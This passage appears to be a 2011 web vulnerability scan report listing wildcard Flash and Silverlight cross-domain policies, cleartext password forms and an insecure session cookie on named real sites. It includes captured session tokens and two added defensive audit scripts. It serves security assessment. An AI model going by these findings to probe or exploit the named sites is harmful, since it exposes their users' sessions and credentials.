<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.14. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.195
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

5.15. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.55.26.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy (clientaccesspolicy.xml) controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. Because such requests are issued by the user's browser and carry the user's cookies for the publishing domain, any domain allowed by the policy can potentially attack users of the application: if a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
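The Flash policies in section 5 and the Silverlight policies in section 6 fail the review above for the same reason: a `domain="*"` / `<domain uri="*"/>` entry trusts every origin on the internet, and the 2o7.net hosts additionally combine it with `secure="false"` and arbitrary request headers. The script below is an added example (it is not part of the scan report or of the scanner that produced it) that parses both policy formats offline and grades each entry. The three sample policies are constructed to mirror the shapes quoted in this report; the severity labels and the `worst()` helper are this script's own conventions. Note that plugin content is often removed while the policy files stay behind, so a stale `crossdomain.xml` still deserves this check.

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies for over-broad trust.

Added example for this report section; not part of the scan output."""
import xml.etree.ElementTree as ET  # for untrusted input, prefer defusedxml

SEVERITY_ORDER = {"info": 0, "low": 1, "medium": 2, "high": 3}


def audit_flash_policy(xml_text):
    """Return (severity, message) findings for a crossdomain.xml body."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("high", "root element is %r, not cross-domain-policy" % root.tag)]
    for elem in root.iter("allow-access-from"):
        domain = elem.get("domain", "")
        if domain == "*":
            findings.append(("high", "any origin may read responses with the user's cookies attached"))
        elif domain.startswith("*."):
            findings.append(("low", "every host under %s is trusted" % domain[2:]))
        elif domain:
            findings.append(("info", "explicit host trusted: %s" % domain))
        # secure="false" only matters when the policy itself is served over
        # HTTPS: it then lets http:// content reach https:// resources.
        if elem.get("secure", "true").lower() == "false":
            findings.append(("medium", 'secure="false" for %s: plain-HTTP origins trusted for HTTPS content' % (domain or "?")))
    for elem in root.iter("allow-http-request-headers-from"):
        if elem.get("domain") == "*" and elem.get("headers") == "*":
            findings.append(("high", "any origin may send arbitrary request headers"))
    return findings


def audit_silverlight_policy(xml_text):
    """Return (severity, message) findings for a clientaccesspolicy.xml body."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "access-policy":
        return [("high", "root element is %r, not access-policy" % root.tag)]
    for policy in root.iter("policy"):
        allow = policy.find("allow-from")
        if allow is not None:
            for dom in allow.iter("domain"):
                uri = dom.get("uri", "")
                if uri in ("*", "http://*", "https://*"):
                    findings.append(("high", "any origin (%s) may read responses with the user's cookies attached" % uri))
                elif "*." in uri:
                    findings.append(("low", "wildcard origin trusted: %s" % uri))
                elif uri:
                    findings.append(("info", "explicit origin trusted: %s" % uri))
            if allow.get("http-request-headers") == "*":
                findings.append(("medium", "trusted origins may send arbitrary request headers"))
        grant = policy.find("grant-to")
        if grant is not None:
            for res in grant.iter("resource"):
                if res.get("path") == "/" and res.get("include-subpaths", "false").lower() == "true":
                    findings.append(("info", "grant covers the entire site"))
    return findings


def worst(findings):
    """Highest severity present, or None for a policy with no entries."""
    if not findings:
        return None
    return max((sev for sev, _ in findings), key=SEVERITY_ORDER.__getitem__)


# Constructed samples with the same shapes as the policies quoted in the report.
FLASH_OPEN = """<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>"""

FLASH_SCOPED = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="*.googlesyndication.com" />
</cross-domain-policy>"""

SILVERLIGHT_OPEN = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*" />
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>"""

if __name__ == "__main__":
    for label, fn, text in (("flash-open", audit_flash_policy, FLASH_OPEN),
                            ("flash-scoped", audit_flash_policy, FLASH_SCOPED),
                            ("silverlight", audit_silverlight_policy, SILVERLIGHT_OPEN)):
        for sev, msg in fn(text):
            print("%-12s %-7s %s" % (label, sev, msg))
```

Grading the scoped Google policy as "low" matches the report's own severity for 5.13: the risk there is not the wildcard itself but that one compromised host under `*.googlesyndication.com` inherits the trust. A `master-only` `site-control` element (seen on adnxs.com and facebook.com) limits which policy files count but does nothing to narrow an `allow-access-from domain="*"` in the master file itself.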


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www328
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www273
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www647
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
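The check behind the four instances that follow is mechanical: find every form that carries a `type="password"` input, resolve its `action` against the page URL (an absent or empty action posts back to the page itself), and flag the form when the resolved scheme is `http`. The script below is an added example, not part of the scan report or the scanner's own logic. The page URL and HTML are constructed: the sign-in form mirrors the one quoted from www.telkomsel.com in 7.3 and 7.4, and the other two forms are invented controls.

```python
"""Flag HTML forms whose password fields would be submitted over clear-text HTTP.

Added example for this report section; not part of the scan output."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> with its action and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): v for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action"), "passwords": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["passwords"].append(a.get("name") or a.get("id") or "<unnamed>")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url, html):
    """Return [(resolved action URL, [password field names])] for every form
    that carries a password field and would post to an http:// URL."""
    collector = _FormCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for form in collector.forms:
        if not form["passwords"]:
            continue
        # An absent or empty action means the form posts back to the page's own
        # URL, so a clear-text page yields a clear-text submission.
        action = urljoin(page_url, form["action"] or "")
        if urlsplit(action).scheme.lower() == "http":
            hits.append((action, form["passwords"]))
    return hits


# Constructed sample: the first form mirrors the telkomsel.com sign-in form
# quoted in this section; the other two are controls that must not be flagged.
PAGE_URL = "http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html"
SAMPLE_HTML = """
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" type="text" />
<input id="password" name="password" type="password" />
</form>
<form id="search" action="/search"><input name="q" type="text" /></form>
<form id="tls-login" method="post" action="https://www.telkomsel.com/loginmember">
<input name="password" type="password" />
</form>
"""

if __name__ == "__main__":
    for action, fields in cleartext_password_forms(PAGE_URL, SAMPLE_HTML):
        print("clear-text password submission to %s (fields: %s)" % (action, ", ".join(fields)))
```

Two caveats a practitioner should keep in mind. A form on a clear-text page that posts to an `https://` action (the third sample form) passes this check but is still exposed, because the page markup itself can be rewritten in transit to point elsewhere; the page scheme matters as much as the action scheme. And forms assembled in JavaScript, like the MetLife script in 7.2, are invisible to a static parser and have to be caught by inspecting the submitted requests instead.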


7.1. http://everquest2.com/free_to_play

Summary

Severity:   High
Confidence:   Certain
Host:   http://everquest2.com
Path:   /free_to_play

Issue detail

The page contains a form (id preRegForm) which is submitted over clear-text HTTP. As quoted below, the form has no action attribute, so it posts back to the page's own clear-text URL, http://everquest2.com/free_to_play. The form contains the following password fields: stationPassword, stationConfirmPassword.

Request

GET /free_to_play HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:14 GMT
Set-Cookie: locale=en; Domain=everquest2.com; Expires=Wed, 12-Jul-2079 16:44:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26302

                       
                                                                                               <!DOCTYPE HTML>
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <META name="verify-v1" content="FAL4eTH1ff6uBoYCGOj7efgHT8x
...[SNIP]...
<div class="formarea">    <form id="preRegForm">
       <!--
       <div id="countryContainer">
...[SNIP]...
</label>
           <input type="password" name="stationPassword" id="stationPassword" class="textfield transparent validate[required,funcCall[mustContainANumber],length[6,15]]">
    <div class="clean">
...[SNIP]...
</label>
           <input type="password" name="stationConfirmPassword" id="stationConfirmPassword" class="textfield transparent validate[required,funcCall[validate2fields]]">
    <div class="clean">
...[SNIP]...

7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /system/js/webforms/cta/signinmainjs.js

Issue detail

The response is a script that assembles login forms client-side and submits them automatically on load; in the quoted fragment the form action is taken from a script variable (mlURL) rather than a fixed URL. The form contains the following password field: PASSWORD, whose value is pre-filled from a script variable (esrvPassword) before submission.

Request

GET /system/js/webforms/cta/signinmainjs.js HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; MetTempReq=true; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:00:25 GMT
Server: IBM_HTTP_Server
Last-Modified: Sun, 17 Apr 2011 22:26:23 GMT
Content-Type: application/x-javascript
Content-Language: en-US
Cache-Control: max-age=1800
Expires: Fri, 24 Jun 2011 17:30:25 GMT
Vary: Accept-Encoding
Content-Length: 32444

var envURL = "";
var postURL;
var targetURL;
var newenvURL="";
var newenvURL1="";

function signInSelect(formName) {
   //alert(formName);
   var userSelect = document.getElementById("signinOption
...[SNIP]...
<body onLoad='javascript:document.getElementById(\"loginForm\").submit()'><form id='loginForm' action='" + mlURL + "' method='POST'>";
               mlFormhtml += "<div style='display:none'>
...[SNIP]...
<input type='text' id='USER' name='USER' value='" + esrvUserName + "'/>";
       eservFormhtml += "<input type='password' id='PASSWORD' name='PASSWORD' value='" + esrvPassword + "'/>";
       eservFormhtml += "<input type='hidden' name='SMENC' value='ISO-8859-1'/>
...[SNIP]...

7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/550-Paket-BlackBerry-Pilihan.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.telkomsel.com/loginmember. The form contains the following password field: password.

Request

GET /product/blackberry/550-Paket-BlackBerry-Pilihan.html HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975; __utmz=80575250.1308921411.1.1.utmcsr=beta.telkom.co.id|utmccn=(referral)|utmcmd=referral|utmcct=/rss/SimplePie/index.php; __utma=80575250.1631938963.1308921411.1308921411.1308921411.1; __utmc=80575250; __utmb=80575250.1.10.1308921411

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:22:40 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 101727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...

7.4. http://www.telkomsel.com/product/blackberry/undefined

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/undefined

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://www.telkomsel.com/loginmember. The form contains the following password field: password.

Request

GET /product/blackberry/undefined HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 96122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="http://www.telkomsel.com/loginmember">
<input id="username" name="username" class="tinput" value="msisdn number" title="username" tabindex="4" type="text" onclick="if(this.value=='msisdn number'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'msisdn number':this.value;" />
<input id="password" name="password" class="tinput" value="password" title="password" tabindex="5" type="password" onclick="if(this.value=='password'){ this.value='';}else{this.value=this.value;}" onfocus="this.select()" onblur="this.value=!this.value?'password':this.value;" />
<p class="remember">
...[SNIP]...

8. SSL cookie without secure flag set

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set: PHPSESSID (set twice in the response, once with path=/ and once with no attributes at all). The cookie appears to contain a session token, which may increase the risk associated with this issue; the same PHPSESSID value also appears in the request URL (see section 9). You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


